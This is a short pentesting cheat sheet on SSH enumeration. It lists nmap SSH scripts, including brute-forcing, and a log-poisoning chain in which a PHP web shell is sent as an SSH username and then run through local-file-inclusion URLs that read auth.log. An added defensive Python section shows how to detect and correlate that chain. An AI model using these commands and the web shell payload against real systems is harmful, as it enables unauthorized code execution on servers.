SSH Enum

SSH Enumeration

CheckList

Probably not useful unless you have uploaded a key somewhere or found a private key file. Sometimes useful for log file poisoning with LFI.

Login and test SSH connectivity

ssh username@somedomain.com
OR
ssh username@10.10.10.20

SSH NMAP Scripts

nmap -sV -Pn -vv -p 22 --script ssh-auth-methods,ssh-brute,ssh-hostkey,ssh-publickey-acceptance,ssh-run,ssh2-enum-algos,sshv1 10.10.10.20

Code Execution through SSH/LFI

ssh '<?php system($_GET['cmd']); ?>'@10.10.10.10
==========================================================================
After this, on the LFI you have discovered, just add the cmd variable to the request:
?cmd=id
&cmd=id

http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=whoami
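
The defender's view of the log poisoning chain above, as an added example that is not part of the original page: it flags sshd "Invalid user" entries whose username is not a plausible account name, flags web requests whose query string points at a log path, and correlates the two by source IP. The log lines, regexes and function names are constructed for illustration, and the account-name pattern is an assumption to adjust per site.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not from a real host) in the usual sshd / access-log shapes.
AUTH_LOG = [
    "Mar  3 10:01:12 web sshd[1412]: Invalid user backup from 10.10.10.5 port 40022",
    "Mar  3 10:02:40 web sshd[1420]: Invalid user <?php system($_GET['cmd']); ?> from 10.10.10.5 port 40110",
    "Mar  3 10:03:05 web sshd[1431]: Accepted publickey for deploy from 10.10.10.7 port 51234 ssh2",
]
ACCESS_LOG = [
    '10.10.10.5 - - [03/Mar/2024:10:04:00 +0000] "GET /somedir/lfi.php?file=..%2F..%2F..%2Fvar%2Flog%2Fauth.log&cmd=id HTTP/1.1" 200 5120',
    '10.10.10.7 - - [03/Mar/2024:10:04:09 +0000] "GET /somedir/lfi.php?file=about.html HTTP/1.1" 200 812',
]

# Greedy .* keeps everything up to the last " from <ip> port <n>" as the username.
INVALID_USER = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>.*) from (?P<ip>\S+) port \d+")
# Assumption: what a legitimate account name looks like on this site.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,31}\$?")
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<url>\S+)')

def poisoned_ssh_users(lines):
    """Return (ip, username) for failed logins whose username is not a plausible account name."""
    hits = []
    for line in lines:
        m = INVALID_USER.search(line)
        if m and not SAFE_NAME.fullmatch(m["user"]):
            hits.append((m["ip"], m["user"]))
    return hits

def log_inclusion_requests(lines):
    """Return (ip, decoded_url) for requests whose query contains traversal or a log path."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        url = unquote(unquote(m["url"]))  # decode twice to catch double-encoding
        if re.search(r"\.\./|/var/log/", url.partition("?")[2]):
            hits.append((m["ip"], url))
    return hits

def correlate(auth_lines, access_lines):
    """Source IPs that both wrote a suspicious username and requested a log file via the web app."""
    ssh_ips = {ip for ip, _ in poisoned_ssh_users(auth_lines)}
    return sorted({ip for ip, _ in log_inclusion_requests(access_lines) if ip in ssh_ips})
```

A hit from the first function only becomes code execution if the web server account can read the auth log and the application includes it, so the file's permissions and the include path handling are the places to fix.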
